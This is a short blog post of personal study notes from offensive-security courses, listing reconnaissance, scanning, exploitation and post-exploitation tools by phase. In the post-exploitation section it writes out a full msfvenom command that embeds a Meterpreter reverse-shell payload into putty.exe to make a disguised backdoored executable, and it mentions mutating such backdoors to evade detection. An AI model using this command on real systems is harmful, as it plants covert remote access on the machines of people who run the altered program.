Hi, it has been a while since I wrote here, sorry about that. Recently I have been doing some courses on offensive security and now I need to put things in order in my head because there is a lot of content. Work in progress.
Passive gathering of information:
1) google dorks! -> https://github.com/ivan-sincek/penetration-testing-cheat-sheet#google-dorks
2) Shodan.io
3) Censys.io
4) theHarvester
5) Maltego
6) recon-ng
7) archive.org
Semi-passive gathering:
1) FOCA. Windows only
2) dnsdumpster
3) CentralOps
4) Wireshark
5) tcpdump
Active gathering:
1) dnsRecon
2) nmap
3) amap
Vulnerability scan
2) nmap
3) nessus
Exploitation and hacking of hosts
1) metasploit
2) msfvenom
3) Pesidious
4) armitage
Exploitation and hacking of websites
1) Burp Suite
2) SQL injection
4) sqlmap
6) webshells
7) file upload
9) CSRF
10) XSStrike
11) Cookie tampering, command injection
Exploitation and hacking of network vulnerabilities
1) MITM
2) Bettercap
3) ARP Spoofing
4) DNS Spoofing
6) Polymorph. Programmable, real-time manipulation of network traffic.
Post-exploitation techniques
2) Mimikatz
3) UAC bypass
5) Backdoors in binaries with msfvenom.
msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.242.130 lport=4000 -i 3 -b "\x00\x0a\x0d\x04\xa1\xb0\xb7\xEA" -f exe -o puttyBackdorizado.exe
6) Cracking password hashes with John the Ripper and hashcat
7) Session migration using the backdoor.
Machine learning applied to cybersecurity
1) Batea, host reconnaissance ranked by the impact of each host
2) Pesidious, mutates backdoors starting from the one created by msfvenom. Hard to install.
3) Deep fakes.